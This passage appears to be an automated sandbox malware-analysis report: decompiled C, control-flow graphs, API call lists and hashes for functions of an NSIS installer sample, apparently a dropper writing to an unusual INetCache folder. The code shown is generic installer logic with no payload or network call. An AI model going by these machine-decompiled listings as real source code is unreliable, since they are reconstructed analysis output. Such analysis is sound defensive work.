                                                          0x00401785
                                                          0x0040178a
                                                          0x0040178d
                                                          0x00401794
                                                          0x004017b0
                                                          0x00401796
                                                          0x00401797
                                                          0x00401797
                                                          0x004017b6
                                                          0x004017bb
                                                          0x004017bb
                                                          0x004017bf
                                                          0x004017c2
                                                          0x004017c7
                                                          0x004017c9
                                                          0x004017cb
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017db
                                                          0x004017db
                                                          0x004017ec
                                                          0x004017ee
                                                          0x004017ee
                                                          0x004017ef
                                                          0x004017ef
                                                          0x004017f2
                                                          0x004017f5
                                                          0x004017f8
                                                          0x004017f8
                                                          0x004017ff
                                                          0x0040180e
                                                          0x00401813
                                                          0x00401816
                                                          0x00401819
                                                          0x00000000
                                                          0x00000000
                                                          0x0040181b
                                                          0x0040181e
                                                          0x00401874
                                                          0x00401879
                                                          0x004015b6
                                                          0x00402885
                                                          0x00402885
                                                          0x00402abf
                                                          0x00402ac2
                                                          0x00402ac2
                                                          0x00000000
                                                          0x00401820
                                                          0x00401826
                                                          0x0040182d
                                                          0x0040183a
                                                          0x00401845
                                                          0x0040185b
                                                          0x0040185b
                                                          0x0040185e
                                                          0x00000000
                                                          0x00401864
                                                          0x00401864
                                                          0x00401865
                                                          0x00401882
                                                          0x00402ac8
                                                          0x00402ac8
                                                          0x00402ac8
                                                          0x00401867
                                                          0x00401867
                                                          0x00401868
                                                          0x00401493
                                                          0x004022f1
                                                          0x004022f1
                                                          0x004022f1
                                                          0x00401865
                                                          0x0040185e
                                                          0x00402aca
                                                          0x00402ace
                                                          0x00402ace
                                                          0x00401892
                                                          0x00401897
                                                          0x0040189d
                                                          0x0040189e
                                                          0x0040189f
                                                          0x004018a2
                                                          0x004018a5
                                                          0x004018aa
                                                          0x004018b0
                                                          0x004018b4
                                                          0x004018b6
                                                          0x004018be
                                                          0x004018ca
                                                          0x004018b8
                                                          0x004018b8
                                                          0x004018bc
                                                          0x00000000
                                                          0x00000000
                                                          0x004018bc
                                                          0x004018d3
                                                          0x004018d9
                                                          0x004018db
                                                          0x00000000
                                                          0x004018e1
                                                          0x004018e1
                                                          0x004018e4
                                                          0x004018fc
                                                          0x004018e6
                                                          0x004018e9
                                                          0x004018f2
                                                          0x004018f2
                                                          0x00401901
                                                          0x00401906
                                                          0x004022ec
                                                          0x00000000
                                                          0x004022ec
                                                          0x00000000

                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                            • Part of subcall function 004052B0: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                            • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                            • Part of subcall function 004052B0: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00403233), ref: 0040530B
                                                            • Part of subcall function 004052B0: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll), ref: 0040531D
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp$C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll$Call
                                                          • API String ID: 1941528284-2468302104
                                                          • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                          • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                          • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                          • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 629 4052b0-4052c5 630 4052cb-4052dc 629->630 631 40537c-405380 629->631 632 4052e7-4052f3 lstrlenW 630->632 633 4052de-4052e2 call 40626e 630->633 635 405310-405314 632->635 636 4052f5-405305 lstrlenW 632->636 633->632 638 405323-405327 635->638 639 405316-40531d SetWindowTextW 635->639 636->631 637 405307-40530b lstrcatW 636->637 637->635 640 405329-40536b SendMessageW * 3 638->640 641 40536d-40536f 638->641 639->638 640->641 641->631 642 405371-405374 641->642 642->631
                                                          C-Code - Quality: 100%
                                                          			E004052B0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x4291e4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040626E(_t38, 0, 0x4226c8, 0x4226c8, _a4);
					}
					_t27 = lstrlenW(0x4226c8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291c8, 0x4226c8); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226c8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226c8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226c8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                          0x004052b6
                                                          0x004052c0
                                                          0x004052c5
                                                          0x004052cb
                                                          0x004052d6
                                                          0x004052d9
                                                          0x004052dc
                                                          0x004052e2
                                                          0x004052e2
                                                          0x004052e8
                                                          0x004052f0
                                                          0x004052f3
                                                          0x00405310
                                                          0x00405314
                                                          0x0040531d
                                                          0x0040531d
                                                          0x00405327
                                                          0x00405330
                                                          0x0040533c
                                                          0x00405343
                                                          0x00405347
                                                          0x0040534a
                                                          0x0040535d
                                                          0x0040536b
                                                          0x0040536b
                                                          0x0040536f
                                                          0x00405371
                                                          0x00405374
                                                          0x00000000
                                                          0x00405374
                                                          0x004052f5
                                                          0x004052fd
                                                          0x00405305
                                                          0x0040530b
                                                          0x00000000
                                                          0x0040530b
                                                          0x00405305
                                                          0x004052f3
                                                          0x00405380

                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                          • lstrlenW.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00403233), ref: 0040530B
                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll), ref: 0040531D
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll
                                                          • API String ID: 2531174081-3951770913
                                                          • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                          • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                          • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                          • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 643 402644-40265d call 402c15 646 402663-40266a 643->646 647 402abf-402ac2 643->647 648 40266c 646->648 649 40266f-402672 646->649 650 402ac8-402ace 647->650 648->649 651 4027d6-4027de 649->651 652 402678-402687 call 4061ac 649->652 651->647 652->651 656 40268d 652->656 657 402693-402697 656->657 658 40272c-40272f 657->658 659 40269d-4026b8 ReadFile 657->659 660 402731-402734 658->660 661 402747-402757 call 405dc1 658->661 659->651 662 4026be-4026c3 659->662 660->661 663 402736-402741 call 405e1f 660->663 661->651 671 402759 661->671 662->651 665 4026c9-4026d7 662->665 663->651 663->661 668 402792-40279e call 406193 665->668 669 4026dd-4026ef MultiByteToWideChar 665->669 668->650 669->671 672 4026f1-4026f4 669->672 675 40275c-40275f 671->675 676 4026f6-402701 672->676 675->668 677 402761-402766 675->677 676->675 678 402703-402728 SetFilePointer MultiByteToWideChar 676->678 679 4027a3-4027a7 677->679 680 402768-40276d 677->680 678->676 681 40272a 678->681 682 4027c4-4027d0 SetFilePointer 679->682 683 4027a9-4027ad 679->683 680->679 684 40276f-402782 680->684 681->671 682->651 685 4027b5-4027c2 683->685 686 4027af-4027b3 683->686 684->651 687 402784-40278a 684->687 685->651 686->682 686->685 687->657 688 402790 687->688 688->651
                                                          C-Code - Quality: 83%
                                                          			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061AC(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E1F( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DC1( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406193( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                          0x00402644
                                                          0x00402646
                                                          0x00402649
                                                          0x0040264b
                                                          0x0040264e
                                                          0x00402653
                                                          0x00402657
                                                          0x0040265a
                                                          0x0040265d
                                                          0x00402abf
                                                          0x00402ac2
                                                          0x00402663
                                                          0x00402663
                                                          0x0040266a
                                                          0x0040266c
                                                          0x0040266c
                                                          0x00402672
                                                          0x004027d6
                                                          0x004027d6
                                                          0x004027d9
                                                          0x004027de
                                                          0x004015b6
                                                          0x00402885
                                                          0x00402885
                                                          0x00000000
                                                          0x00402678
                                                          0x00402679
                                                          0x00402684
                                                          0x00402687
                                                          0x00402693
                                                          0x00402697
                                                          0x0040272f
                                                          0x00402747
                                                          0x00402757
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040269d
                                                          0x0040269d
                                                          0x004026a0
                                                          0x004026a1
                                                          0x004026a4
                                                          0x004026a9
                                                          0x004026b0
                                                          0x004026b8
                                                          0x00000000
                                                          0x004026be
                                                          0x004026be
                                                          0x004026c3
                                                          0x00000000
                                                          0x004026c9
                                                          0x004026c9
                                                          0x004026d1
                                                          0x004026d4
                                                          0x004026d7
                                                          0x00402792
                                                          0x00402799
                                                          0x004026dd
                                                          0x004026e3
                                                          0x004026ef
                                                          0x00402759
                                                          0x00402759
                                                          0x004026f1
                                                          0x004026f1
                                                          0x004026f4
                                                          0x004026f6
                                                          0x004026f6
                                                          0x004026f6
                                                          0x004026f9
                                                          0x004026fe
                                                          0x00402701
                                                          0x00000000
                                                          0x00000000
                                                          0x00402703
                                                          0x00402706
                                                          0x0040270e
                                                          0x0040271a
                                                          0x00402728
                                                          0x00000000
                                                          0x0040272a
                                                          0x00000000
                                                          0x0040272a
                                                          0x00000000
                                                          0x00402728
                                                          0x004026f6
                                                          0x0040275c
                                                          0x0040275f
                                                          0x00000000
                                                          0x00402761
                                                          0x00402766
                                                          0x004027a7
                                                          0x004027c9
                                                          0x004027d0
                                                          0x004027b5
                                                          0x004027b5
                                                          0x004027b8
                                                          0x004027bb
                                                          0x004027be
                                                          0x004027be
                                                          0x00000000
                                                          0x0040276f
                                                          0x0040276f
                                                          0x00402772
                                                          0x00402775
                                                          0x0040277b
                                                          0x0040277f
                                                          0x00402782
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402782
                                                          0x00402766
                                                          0x0040275f
                                                          0x004026d7
                                                          0x004026c3
                                                          0x004026b8
                                                          0x00000000
                                                          0x00402784
                                                          0x00402784
                                                          0x00402787
                                                          0x00402790
                                                          0x00000000
                                                          0x00402687
                                                          0x00402672
                                                          0x00402ac8
                                                          0x00402ace

                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                            • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                          • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                          • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                          • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 689 4065b6-4065d6 GetSystemDirectoryW 690 4065d8 689->690 691 4065da-4065dc 689->691 690->691 692 4065ed-4065ef 691->692 693 4065de-4065e7 691->693 695 4065f0-406623 wsprintfW LoadLibraryExW 692->695 693->692 694 4065e9-4065eb 693->694 694->695
                                                          C-Code - Quality: 100%
                                                          			E004065B6(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                          0x004065cd
                                                          0x004065d6
                                                          0x004065d8
                                                          0x004065d8
                                                          0x004065dc
                                                          0x004065ef
                                                          0x004065e9
                                                          0x004065e9
                                                          0x004065e9
                                                          0x00406608
                                                          0x0040661c
                                                          0x00406623

                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                          • wsprintfW.USER32 ref: 00406608
                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                          • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                          • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                          • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
